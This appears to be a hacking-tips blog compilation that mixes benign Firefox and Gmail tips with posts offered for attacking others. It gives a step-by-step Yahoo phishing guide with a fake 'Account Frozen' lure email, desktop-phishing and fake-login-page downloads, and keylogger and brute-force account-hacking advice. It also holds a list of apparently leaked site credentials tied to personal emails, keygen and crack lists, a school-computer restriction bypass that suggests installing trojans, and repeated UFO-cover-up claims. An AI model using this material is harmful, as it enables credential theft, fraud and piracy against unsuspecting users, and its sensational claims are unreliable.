This summary is not available. Please click here to view the post.
Desktop Phishing -by Zeri Thunder
Desktop Phishing
we thank Zero Thunder for desgning such a wonderfull n complete tute on this topic
Code:
http://www.mediafire.com/download.php?zog4z0mgzmd
What is Desktop Phishing
This is a very advance way of Phishing. a lot different than the common way of Phishing. In the common way of phishing you can't get the real domain for an example: http://www.phishier.freehost.com but in Desktop Phisher you can get the http://www.phisher.com.
Old way of Phishing = http://www.paypal.freehost.com
Desktop Phishing = http://www.paypal.com
Whats Deference between
Phishing and Desktop Phishing
What is a Phisher Arm
Phisher Arm is programme that will change your IP Mapping Settings, Youdon't need to know a programme any programming laguage for this . you can make a Phisherarm with some tools you have in your computer
How DeskTop Phisher Works
Desktop Phisher need a Phisher Arm to get the victom to the phisher page . whenvictim run the phisher arm it will change the IP mapping on ur system it will add the attackers IPto the domain you made a phisher. When he type the domain it will locate to the phisher host uhave with.
Premium account
Following are the list of usernames and passwords of the premium accounts for Best downloads sites.
…!! ENJOY !!…
!!…100% Working Accounts…!!1.) www.divxcrawler.com {download movies fastly}Username : divx273 Password : 83427292.)
www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}Username : cinemanetwork20 Password : butterfly203.)
www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}Username : lo886Ees Password : zAgt88er4.)
www.sharingzone.net {movies, Pc softwares, Pc Games}Username : LODMQYHX Password : 375021402
www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}Username : ga20me Password : ke01feb6.)
www.watchdirect.tv {movies, music, Pc Games, online Tv}Username : cinemanetwork20 Password : butterfly207.)
www.fulldownloads.us {Greatly Every thing}Username : Af872HskL Password : XjsdH28N9.)
www.pirateaccess.com {Every thing}Username : yourfrienddalat@gmail.com
Password : CHh5LKPI Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb510.) www.warezquality.com {Every thing}Username : ageg2020
Password : z8fsDfg311.) wwww.warezreleases.com {All Stuff}Username : HnRPxKQz
Password : a59KBV7 Username : a25bipZP
Password : 1TeVnoJb Username : SHYyJfWU
Password : P4K20uO12.) www.fulldownloadaccess.com {All Stuff}Username : mpuv3y
Password : ykbcKTNSUsername : AL3429355
Password : RCHAbhKMUsername : AL3429350
Password : gMZNFcySUsername : AL3429351
Password : cTAkWAxcUsername : AL3429352
Password : ykbcKTNS14) www.gamedownloadnow.com {All Stuff}Username : ga20me
Password : ke01feb16.) www.tvadvanced.com {online Tv}Username : mv03dlPassword : frmvdl
Gain Admin privilage- good 4 uni students (sliit ppl watch it)
This works on WIn 2000 & WIN XP.
I will teach u how we can gain access to the website you want to
for free, and how you can gain access to 'control panel', and the various
other tools of Widows that may have been blocked from your grasp like 'regedit'.
When u are at the log on screen, type in your username and
password. NOW When you hit enter, and it comes up with
the next screen, the rectangle one, immediatly pull out the network
cable i.e. the cable wire.
Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no
network access. But that's cool because now we can access 'Internet options',
click in the 'connections' tab click the LAN settings, click the proxy
settings, and in the little white box at the bottom we can specify websites
that bypass the proxy server (eg www.yahoo.com) Now once you have changed
the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the
internet settings you specified.
This is just an 'Unplugging technique' to gain access to a comp. locked by the administrator.Now you can gain access to msconfig, regedit, command etc disable the virus scanner, u can install a trogan or a virus according to u're will.
And now there is nothing the administrator can do about this.
How to Access Banned Websites
Surfing at school? Parents enabled website blocking? Stuck behind a strict firewall? There are lots of ways around the problem so that you can get to the sites you want to see without those cybernannies tying your hands…phproxy is “dedicated to bringing you fast web browsing from behind web filters”. Simply tap in the URL of that banned site you really must see, it could be Facebook, MySpace, Youtube, or a renegade blogger behind enemy lines, and you will be able to access it with no problems. More seriously, the proxy allows you to visit a site anonymously because it is the proxy itself that is visiting the banned site not you, and so keeps your browsing hidden from prying eyes allowing you to protect your online identity.
Such a proxy also allows you to visit sites that have banned your IP. This might be a forum or just a website or blog from which you or other users on your IP range (whether on your school or company network or your ISP account) have been barred access. The proxy server is an open gateway between your web destination and you.
Other proxies exist, such as www.the-cloak.com (please make sure you include the hyphen in that URL or you will be in for a shock),
More on an additional approach (Psiphon) here – http://en.wikipedia.org/wiki/Psiphon
Of course, we should add a disclaimer at this point, please don’t use proxies or anonymizers to break the law or to cause malice and please don’t abuse the service as they are usually free.
The Pentagon hacker - Gary McKinnon
Gary McKinnon is a British Hacker who hacked several United States Government Agencies like NASA, Department of Defense and the navy. He is facing extradition to the United States for what they (the prosecutor) calls the "biggest military computer hack of all time" He is accused of actually damaging 79 computers what makes a total of 700.000 dollars of damage.
While exploring these systems he came across interesting “proof” of extraterrestrial life and UFO cover-ups by NASA. While he was Remote Desk-toping a computer in a department of NASA where they apparently “photoshop” pictures from outer space in order to brush out the flying objects and extraterrestrial ruins of buildings.
You can download and listen to the BBC radio interview here.
Watch Vedio Interview With Gary McKinnon
While exploring these systems he came across interesting “proof” of extraterrestrial life and UFO cover-ups by NASA. While he was Remote Desk-toping a computer in a department of NASA where they apparently “photoshop” pictures from outer space in order to brush out the flying objects and extraterrestrial ruins of buildings.
You can download and listen to the BBC radio interview here.
Watch Vedio Interview With Gary McKinnon
Get all passwords from firefox
This is extremely easily.
Step 1. Open up firefox.
Step 2. Go into the "tools" tab
Step 3. Click on "Option"
Step 4. Go to the Security tab , and Click on Saved passwords.
Final step 5. Click on Show passwords.
How to avoid this being used on you
Go to the Security Tab and Set a master password
Thank you
3 Firefox Tips You May Not Know About
The thing I like best about Firefox is that just when you think you know everything there is to know about the browser, something new comes along and surprises you.
I discovered five new Firefox tips today. Maybe these are old hat and you know them already. Or maybe like me, you had no idea these could be done.
1. Delete visited URL’s
When you drop down the box underneath the address bar, you can see your recent browsing history. But what if you want to remove one URL from that list? Maybe you’ve been looking at a naughty site and you don’t want your girfriend to know? Or maybe you’ve been shopping for your loved one online and you want to keep it a secret?
Just drop down the URL box, highlight the URL you want to zap then press the “delete” button on your keyboard. The URL will then be removed from the list.
2. Navigate to browser tabs using the keyboard
Instead of using the mouse to click on a tab, why not use the keyboard instead? Pressing CTRL + TAB together will bounce you from tab to tab, starting from the one in the far left and working its way along. Or if you want to go to a specifc tab straight away, you can do that too. CTRL + 2 will take you directly to the second tab from the left. CTRL + 5 will take you to the fifth tab from the left.
3. Grab files off webpages, even protected webpages
Have you ever wanted a picture, file or video off a webpage but you can’t, because it’s been protected? Just right-click on the page, choose “View Page Info” then the “media” tab. Find the file you’re looking for from the list and click on “save”. (note : this doesn’t work for everything but I have still had a pretty high success rate nonetheless).
Change your IP ADDRESS using a simple trick.. This trick is only for BSNL BROADBAND users..
1.) First type 192.168.1.1 in your address bar and press enter. You will get a pop-up as shown in the preview asking for username and password.
If you are using bsnl broadband connection via Ethernet cable then 192.168.1.1 and if you are using bsnl broadband via USB cable then 192.128.1.2.. Rest all procedure is same for both..
Type the username: admin and password : admin. Its common for all and incase if ur service provider is using something different then ask them for the same.. Then press OK..
3.) Here under PPPoE/PPPoA and in AUTHENTICATION first keep the option "PAP" anc click on APPLY and check whether your ip address is changed or not.. If its not changed then select the option "CHAP" and click on APPLY. Do this untill IP ADDRESS CHANGES.. Usually two or three times will do the work for you..
4.) Keep refreshing the Rapidshare site to check whether the IP ADDRESS is changed or not. RAPIDSHARE tracks your IP ADDRESS when u download a file and when you start to download another file it asks to purchase PREMIUM account. So if you change the IP ADDRESS it wont recognize your previous download and you can download as many times you change your IP ADDRESS. If you successfully change your IP ADDRESS then u can download as much as you want from RAPIDSHARE... One of the biggest and fastest one-click file hosts in the world. There are many other methods also to change the Ip Address and Download unlimited from Rapidshare.. This is a simple trick i accidently discovered!!
All in one KeyGen
Adobe Acrobat 3D 8.1
Adobe Acrobat 8.0 Professional
Adobe After Effects CS3
Adobe Audition 2.0
Adobe Captivate 3.0
Adobe ColdFusion 8.0
Adobe Contribute CS3
Adobe CS3 Design Premium
Adobe CS3 Web Premium
Adobe Dreamweaver CS3
Adobe Dreamweaver CS3
Adobe Encore DVD 2.0
Adobe Fireworks CS3
Adobe Fireworks CS3
Adobe Flash CS3
Adobe Flex Builder 2.0
Adobe FrameMaker 8.0
Adobe GoLive CS3
Adobe Graphics Server 2.1
Adobe InCopy CS3
Adobe InDesign CS3
Adobe LiveCycle Designer 7.1
Adobe OnLocation CS3
Adobe PageMaker 7.0
Adobe Photoshop CS3 Extended
Adobe Photoshop Elements 5.0
Adobe Photoshop Lightroom 1.1
Adobe Premiere Pro CS3
Adobe RoboHelp 6.0
Adobe Soundbooth CS3
Autodesk 3ds Max 9 32-bit
CompuPic Pro
CyberLink Power2Go 5.5
CyberLink PowerCinema 4.0
CyberLink PowerDirector 6.0
CyberLink Power
DVDCyberLinkPowerDVD Copy 1.0
CyberLink PowerEncoder MPEG-4 AVC 1.0
DivX for Windows 6.6
Inivis AC3D 6.1
Intervideo Disc Master 2.5
PlatinumIntervideo DVD Copy 5.0
PlatinumIntervideo Home Theater 2.5
PlatinumIntervideo Instant Movie Maker 1.0
Intervideo iVideoToGo IPOD 4.5
Intervideo iVideoToGo PSP 4.5
Intervideo MediaOne 1.0
Intervideo MediaOne Gallery 2.0
PlatinumIntervideo WinDVD 8.0
PlatinumIntervideo WinDVD Creator 3.0
PlatinumIntervideo WinDVD Media Center 3.2
Intervideo WinDVD Recorder 5.2
PlatinumIntervideo WinDVR 3.0
Macromedia Authorware 7
Macromedia ColdFusion MX 7.0
EnterpriseMacromedia Director MX 2004
Macromedia Freehand MX 11
Macromedia HomeSite 5.5
Macromedia JRun 4.0
mIRC
Photodex ProShow
Steganos Security Suite 2007
Symantec Norton 360
Symantec Norton Ghost 12.0
TechSmith EnSharpen
TechSmith Products (camtasia etc...)
TuneUp Utilities 2007
WinZip 11.1
WinZip Self-Extractor 3.1
ZoneLabs Products (zone alarm , zone alarm whit spyware, whit antivirus etc.....)
Click below to download the softwareDownload
ARDAMAX KEYLOGGER-(THE BEST ONE)
FRIENDS ...IF U DON'T KNOW ...WHAT IS KEY LOGGER....?I WILL EXPLAIN OK.
KEY LOGGER MEANS:-
JUST ...WHAT U TYPE IN KEYBOARD...LIKE WEBSITE NAME,USER NAME,PASSWORDS ANY ONE...IT CATCHES...PERFECTLY
IT LOOK LIKE BELOW AFTER INSTALLATION
JUST INSTALL THEN..AFTER INSTALLATION.TYPE ANY THING LIKE OPEN ANY WEBSITE ENTER MAIL AND PASSWORDS, ANY THING ..
THEN OPEN UR ...ARDAMAX KEY LOGGER HO U R DEFINITELY SHOCKED..STILL NOT UNDERSTAND MAIL ME FIND MY MAIL BOTTOM OF THIS PAGE.
DOWNLOAD HERE
Key Gen for Nero 9
Nero 9
Nero 9 HD
Move It
Back It Up
Media Home
Grace Note Plug In
Blue Ray Video Plug In
Blue Ray Disc Authoring Plug In
DTS Plug In (Extra)
mp3 Pro Plug In (Extra)
SecurDisc Viewer (Extra)
Nero IN Cd Reader (Extra)
BlueRay HD/DVD Plug In (Extra)
Search Cracks, Serials or Keygens on the GO !
Are you tired of searching the Internet for Cracks, Serials and Keygens with the Risk of Getting infected by Trojans and Worms? Whatever is your reason – illegally install, not genuine, no money to pay, forget purchased original valid serial key, lazy to register product, want to extend trial limit and etc – if you search for cracks or serials online, you will likely end up searching, finding, locating and downloading from a few crack sites or cracks search engines. However, these crack sites contain lots of toolbars, popups, spyware, adware, malware or unwanted components that try to infect your computer. Craagle is an utility that helps you to avoid these nuisance.
Craagle is a free downloadable standalone meta search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with. It works by doing the searching the cracks, serials or album covers directly from Craagle program without the need to visit the websites. Craagle has added advantage of able to search for cover images or graphics for CD, DVD, audio, games and etc.
Craagle also supports usage of proxy server to bypass some sites that have Day Limit or daily usage limit. Craagle source code has over 100,000 characters (engine only, excluded GUI).
How to install?
There is no need to install the program as the exe is portable and can be run without any kind of installation process. To run the program just double click the craagle.exe file. To download click here.
How to search for cracks, serials or keygen in Craagle?
The user interface of Craagle is as follows:
Follow the steps:
1) Type the name of the software.
2) Select whether you want crack, serial or keygen.
3) You may also select a specific website you want to search.
4) Press Search.
5) Select the version of the software.
6) Right click and press Download to get the Key.
7) The Key will be displayed at the bottom as shown in the above figure
8) Activate the software using the given key and Enjoy
Risks:
Craagle is detected by many antivirus and antispyware software as containing Adware, so use it at your own risk. When Craagle is installed, it creates the following files in the current folder: proxy.txt, Options.ini or Craagle.ini.
Crack Sites Supported:
Cracks.Am
KeyGen.Us
AllCracks.Net
Andr.Net,
Crack.Ms
Crackz.Ws
CrackArchive.Com
CrackDb.Com
CrackzPlanet.Com
CrackWay.Com
MsCracks.Com
CrackPortal.Com
TheCracks.Us
KeyGen.Ru
Serial Sites Supported:
Seriall.Com
FreeSerials.Com
SerialSite.Com
Serials.Ws
Andr.Net
SerialKey.Net
SerialArchive.Com
CrackzPlanet.Com
MsCracks.Com
CrackPortal.Com
KeyGen.Name
TheKeys.Ws
FreeSerials.Ws
FreeSerials.Spb.Ru
Serial.220volt.Info
SerialCodes.Net
Download
Link : http://www.easy-share.com/1905219519/Craagle-hungry-hackers.com.rar
Password : hungry-hackers.com
This Post is by Hungry Hackers.com
Thanks for their great work ! :)
Facebook Profile Trick
This is not a Hack - Just a trick :P1- At the "Setting Tab" Above, Chose "Account Setting"
2- Join any network you want ;) "Like Egypt"
3- You will notice this statement
" There are 486,597 people in the Egypt network. " For Example
4- Click on this number, and from know you can see thousands of profiles :)
May this trick to be useful for someones :D
But there is an option in your options on Facebook that made your profile not visible to anyone, but believe me, a lot of people didn't notice that option ;)
Gmail Account Hacking ToolZ
A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.
Gmail Hacks, Tips & Tricks
You already know that Gmail beats all other email providers with its endless customization capabilities, Google product integration and fantastic spam filter. Take it to the next level with these Gmail power user tips and Greasemonkey extensions for Firefox. We haven’t forgotten the Mac users, either. For more great resources, check out the official Gmail blog and the Gmail Power Users group on Google Groups. If you'd like to learn more about other email programs, check out the emailcategory at the web directory.
1. Master the Gmail keyboard shortcuts
If you haven’t already, master the shortcut keys. Compose, mark as read, archive and much more with the press of a button. Sure, you know c for compose and ! for report spam, but do you know g + tfor the sent mail folder? You can find a complete list at the official Gmail shortcut page.
2. Google Code Macros
The Greasemonkey extension for Firefox, familiar to many power users, allows JavaScript functionality on any web page. Piggybacking off of this capability, the generically-named Macros scriptenables a number of keyboard shortcuts. Google apparently integrated some of Macros shortcuts when revamping Gmail, but there are still functions that the Macros programmers believe Gmail needs. “I firmly believe this is *the* essential Gmail trick to end all Gmail tricks,” writes David Chartier at DownloadSquad.
3. Create bookmarklets for frequent searches
This form created by Steve Rubel generates a bookmarklet for searches in Gmail. (By the way, a bookmarklet is a baby bookmark that acts a single click tool for a webpage or browser—thanks, Wikipedia). Take Rubel’s form further by dragging the bookmarklets to your bookmarks bar.
4. Resize your compose box
The aptly-named Resizeable Textarea Firefox extension allows you to click and drag the edge of your compose box without resizing your browser window. Note that any browser built with the newest Opensource.org webkit—Safari, for example—will already have this capability. For more browser info, check out the internet software category.
5. View unread messages first
Search on the string “label:unread label:inbox” to force all of your unread messages to the top of the list, writes Matt Cutts. (Note: you don’t have to create any labels for this to work.) Try bookmarking Cutts’s search and dragging it to your bookmarks bar to view all unread messages first.
6. Streamline adding attachments
Wouldn’t it be great if you could drop attachments directly into the attachment box? Check out the Firefox extension Dragdropupload if you are running Firefox 2.0 (as of this writing, it hadn’t been updated for 2.0.0.12).
7. Quickly switch between Google accounts
If you have multiple Google accounts—a Gmail with Google Apps account and a regular Gmail account, for example—streamline them with this script for Firefox with Greasemonkey. The script adds a “change user” drop-down bar in place of the “sign out” link.
You can also try Gmail Manager (also a Firefox extension), which adds a Gmail menu bar to the Firefox window. Juggle multiple accounts, sign in and out.
8. Bookmark a single email
As of November 2007, all Gmail messages have dedicated URLs (according to the official Gmail blog). Rather than killing a tree by printing the message or laboriously copying down the info, you can CTRL-D (or ?-D) an important email and refer to it at your leisure.
9. Automate frequently repeated text
Signature functionality is built into Gmail, but frequently typed phrases can be automated with Firefox extension Signature, which allows you to insert designated text with a keystroke. (As of this writing, Signature is not yet compliant with Firefox 2.0.0.12.) Also try a Windows app called AutoHotKey or Mac app TypeIt4Me. Both apps allow you to create keystrokes to automate text in virtually any application.
10. POP3 & IMAP forwarding
“I recommend using IMAP (where the mail is both on the server and on your local machine(s)/device(s)) and uploading all your email onto Gmail,” writes Mark Wheeler, a Gmail power user. “You can keep copies on the Google servers and your desktop/laptop/phone so that they are all efficiently accessible and available anytime anywhere. Don't have to worry about backups, or disk space...I have 25,000 emails and have only used 9% of my space!”
To upload old email like my friend did, set up a Gmail IMAP account in your desktop email client. In the client, establish folders that correspond to your Gmail labels, and drag and drop your non-Gmail into the folders. If you're using Outlook with .PST format or Outlook Express, you will have to convert or export the emails to mBox data file format before the messages will translate. The process may take some time, and your client may hang. Also, the original dates and times attached to the messages will appear in Gmail as the dates and times that the messages were imported into Gmail. But it's worth the trouble to utilize your tricked-out Gmail, right? Click here for a tutorial from My Digital Life.
11. Mute a conversation
Ever found yourself subscribed to a mailing list and the current conversation has nothing to do with you? If you don’t want to unsubscribe, you can easily stop the friendly spam with the Gmail mute function. Select a message in the thread and hit the m key to auto-archive all incoming messages in the conversation. The thread will stay muted until you unmute it; it will also un-mute itself if your address appears in the To or CC box.
12. Get it all in one place
Gmail’s built-in Mail Fetcher allows you to receive and send from up to five different accounts via POP3. Unlike a simple forwarding feature, Mail Fetcher allows synchronizing of your Gmail actions with the home server. Go to your Gmail Settings ? Accounts, then Add another mail account. One caveat of sending from non-Gmail accounts: the recipients may see FROM you@Gmail.com on behalf of you@otherdomain.com, especially if the recipients are using a client like Outlook.
13. Get it all in one place
With the Google Toolbar and Gmail combined, power user Steve Rubel has made his Gmail account into a massive archive of his interests. Steal his trick by adding the Google toolbar to your browser. When you happen across text or images you want to save, highlight them and click the send to Gmail link. Rubel has also tons of other great hints.
14. Secure your email
Work that requires maximum security—or run-of-the-mill paranoia—is made easier with this scriptwith Greasemonkey + Firefox. It'll force a secure connection when accessing Gmail. To make sure you're as secure as you can be, check out the internet security category at the web directory.
15. Don't forget that attachment
If your sent folder is full of "Oops, here's the attachment" messages, this handy reminder Greasemonkey script will scan your messages--including replies and forwards--for references to attachments. (The release notes say that it searches for "attached," "attachment" or certain unknown variations.) If you mention an attachment and forget to add it, a prompt will pop up.
16. Gmail Notifier for Windows / Google Notifier for Mac
Rather than keeping a browser window open and hitting CTRL-R like you've got OCD, install a widget like Gmail Notifier for Windows or Google Notifier for Macs. It'll check your email (and Google Calendar, if you're a Mac user) as compulsively as you do. And as with almost everything else under the sun, there's a Firefox extension that will serve the same function (it's not released by Google).
17. Google Desktop Plug-In for Google Notifier
Some users have reported compatibility issues between Google Toolbar, Google Apps and Google Desktop. Everyone's configuration is different, blah blah blah, so it's impossible to know, but Maxim Alexeyev created this Google Desktop Plug-In which purports to replace Google Notifier for Google Desktop and Google Toolbar users. The plug-in also offers multi-username functions and Google Apps support.
18. Check Gmail from the couch with Apple Remote
Mac users who actually use their Apple Remotes (show of hands—anyone? anyone?) can check out this Lifehacker tutorial that lets you check your Gmail from your couch with Firefox shortcuts. There’s gotta be someone out there who needs this…
19. Read your Google Reader RSS feeds in Gmail
Treat your Google Reader RSS feeds the same way you treat old friends with this Greasemonkey + Firefox script. Feeds invading your Gmail will offer more-efficient time-wasting than ever before. Note that Google Reader and Gmail seem to be moving closer together in functionality and interface and it's likely that they'll soon be officially integrated.
20. Include or exclude Chat from search results
Chat conversations are automatically filed like emails with a Chat label, so to exclude Chat when searching, use the string -label:Chat. Conversely, to search only Chat conversations, use the string +label:Chat. The –label: and +label: syntax will work to exclude or include any label in Gmail search results. Another Jim Barr tip.
21. Use Gmail like an external hard drive
Use up any vegetating space in your Gmail account with this Windows drive shell extension. Your Gmail space appears in My Computer/Windows Explorer as an external drive, and when you drag and drop a file to the drive, it sends an email to your Gmail account with the file as an attachment. Note that this is a fairly old program but seems to have been updated for the latest Gmail version. Mac users can try gDisk and Linux users can check out GmailFS.
22. Spam counter hider
You’re browsing through your (overstuffed) inbox. You have many labels, filters and tricks that ensure that your email gets to you efficiently. Even so, you look at the number of messages in the spam folder and a small voice inside you says, “There could be something in the spam folder that doesn’t belong there!” Forget it. There never is. This Greasemonkey + Firefox script hides the spam count number, so the thought doesn’t even cross your mind.
23. Hack Gmail’s CSS
“Stylish is to CSS what Greasemonkey is to JavaScript,” says the Firefox extension page for Stylish. Cascade those style sheets yourself, or grab them from userstyles.org. For more web design tips and tricks, check out these web design and development resources.
24. Launch one-key composing with Launchy (Windows) or Quicksilver (Mac)
Launchy is a free, open source keyword launcher that runs in your system tray and opens apps with designated keystrokes. Launchy’s still “a far cry from Quicksilver for Mac” according to Gina Trapani at Lifehacker, but Adam Pash of Lifehacker says,
“I can't recommend it highly enough.” There’s a quick tutorial on one-key Gmail composing with Launchy—opening a browser logged into Gmail with a compose window with a single keystroke—here.
25. Better Gmail 2 with all-in-one Greasemonkey script
For a one-size-fits-all solution that combines several Greasemonkey scripts into one package, check out Better Gmail 2, which combines dozens of Greasemonkey scripts into one package. Allow HTML use in signatures, force a secure connection, convert labels into folders and make the spam folder invisible. There’s also a Better Gmail 2 extension for those using Firefox 3 beta. Cnet strongly recommends the extension in their review.
26. Create a podcast of your Gmail
Without an iPhone or Blackberry, the morning subway ride can get pretty boring. And you can’t navigate a smartphone while driving—or at least, you shouldn’t. Create an RSS feed from your Gmail account with this syntax:
https://username:password@gmail.google.com/gmail/feed/atom
Then sign for a FeedBurner account to host and distribute it. Use a RSS to podcast site likeAudioDizer.com or one of the many options at NextUp to create text-to-speech files. Voila! This hack is based on a tip from Mike Donaghy. For even more, check out these podcast resources.
27. Force mailto: to open with Gmail
The annoyance of prompts from Outlook or Apple Mail with every mailto: link you click can be ended. This Greasemonkey script forces mailto: scripts to open Gmail. (Note: it’s unclear whether this script is compliant with the newest version of Gmail.)
28. Emulate a mail client
For those who can’t decide between a full-fledged mail client and browser-based Gmail, SimpleMailstraddles the divide with a three-paned mail view. Mac users should note Adam Pash at Lifehacker warns that he had trouble getting IMAP to work with Firefox 3 on the Mac, but he doesn’t mention testing it with Firefox 2.0.0.12.
29. Sort mail with the Trusted Trio
Gina Trapani at Lifehacker suggests sorting your Gmail according to the Trusted Trio system—Follow Up, Hold and Archive. To keep the Inbox clear, sort all messages into one of these three categories. Since Gmail has an archive function built-in, Trapani suggests merely creating two labels—Follow Up and Hold; if desired, add numbers to get the two folders to display in the order you’d like. Check out the full explanation of the Trusted Trio system.
30. Pre-label and sort your mail
Many email providers, including Gmail, allow you to append your address with +something—for example, you can give all of your OS/2 user group buddies your address as you+OS2@gmail.com. (Note that Gmail addresses are not case sensitive). The incoming emails that wax nostalgic about IBM’s late great OS will be pre-labeled, and you can establish filters to sort them. The +something system also allows you to stop spam before it starts. If inappropriate emails with a designated +something address, you can kill off the address. You’ll also have an inkling how the spam got started. Thanks to Jim Barr for this tip.
31. Force Firefox extensions to work with Firefox 3 beta
This Lifehacker tip is for extreme power users only, as it could open your system to serious security flaws and bleeding edge malfunctions. It’s only a few easy steps after the jump. Have fun! User fluxam reports a list of extensions that were functioning in 3 beta as of 02/13/2008.
32. Add address-specific signatures with HTML
If you use multiple Gmail accounts, the Gmail HTML Signatures extension for Firefox + Greasemonkey automates the signature process. Based on the address you’re sending from, this extension will automatically insert HTML-formatted signatures.
33. Backup your Gmail
If you’re using a desktop or smartphone mail client, you’ve already got some backups of your email. But what if you’re all web-based? What if Gmail servers were hit by a nuclear bomb? Stop the paranoia and check the Gmail backup tutorial here and the Google Apps backup tips here.
34. Command line Gmail access (Windows) and nightly backup
There’s a tutorial—not for n00bs—here.
35. Force Gmail Notifier (Windows) to use SSL
This wikihow tutorial involves hex editing. Advanced Mac users with Google Notifier, here’s acomment on the O’Reilly Mac DevCenter forums that should help. Edit at your own risk.
fake login pages for all facebook ,yahoo, orkut
This torrent contains fake login pages for all facebook yahoo orkutdownload and enjoy
Hack Yahoo (phishing)
If you read the article on hacking gmail......... please note that this is the same article and you dont need to read it again :P
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.Now follow the following steps :
1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
2. Now press “CTRL+U”, you will get the source code of yahoo page.NOw press “CTRL+A” copy all the text.
3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with
( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)put the following code after placing your form id:
Now Save the yahoofake.html.
To hack the victim’s password and username the victim has to login through this page.
First of all upload your page using some free webhosting services.
Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”. Now select your site name as mail.yahoo.com/support.
You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.
Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.
Good Luck !
Hacking An Email
So many people have asked that question,and honestly its a dumb one.But its our job,to help you,so i made this thread.
There are many ways to hack an email:
PhishingPhishing is a way of saying keylogger but in an other meaning.Let’s say you want to create a hotmail phishing page.The page should lookexactly like the real one.How does it work:You can download/make a replica of the website you want to phish.And save is as HTML.When you’re done with that,you have to find a wayto upload the HTML.Best way is a Website.Like Piczo/Blogspot.When thats done the user types his/hers username and password.And automaticallyit will be sent to you by mail.And there you have it,that’s Phishing.Here Are Some Tutorials That Help:http://www.hackforums.net/showthread.php?tid=15895http://www.hackforums.net/showthread.php?tid=14154http://www.hackforums.net/showthread.php?tid=12583http://www.hackforums.net/showthread.php?tid=12468
Brute ForcingBrute Forcing is like guessing the password , but instead you make/download a password list[a long txt file containing words that might bethe password] ad the Brute Forcer tries them allDownload your Msn Brute Forcer Here:http://www.speedyshare.com/228815220.html [may find a trojan inside but that's normal]Download Password Lists here:http://www.hackforums.net/showthread.php?tid=15562
KeyloggersKeyloggers is like phishing but is more simple.Its a simple .exe executable.When someone clicks it,the Keylogger auto downloads.And you’llhave ,on your computer,you start it,and put in the ip of the destination,and every hour you’ll receive keys pressed on his computerthats an easy way to find out msn passwords
Here are some tutorials:http://www.hackforums.net/showthread.php?tid=15003http://www.hackforums.net/showthread.php?tid=10365
Fake MsnFake msn is just a replica of Msn Messenger.Let some of your friends come over.And open up the fake msn.Let them type in thermsn hotmail,and their password.Then they will get a troubleshoot , and their username/password will be saved in a .txt file in C:\Download here:http://www.savefile.com/files/1357897
Guessing The Secret QuestionIf you know your friends,this will be an easy task.Go to http://www.hotmail.com and click forgot password,then put in the email addressand then the CATCHA code,reply on the secret question,but beware because you have like 3 tries only.
HACKING MSN - A SMALL TRICK
This is a small trick that worked for me but this is really interesting.
Hacking MSN is actually VERY simple. Msn is designed to route the connection through a microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise microsoft would waste alot of bandwidth so a direct connection is made. This is your chance.
Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.
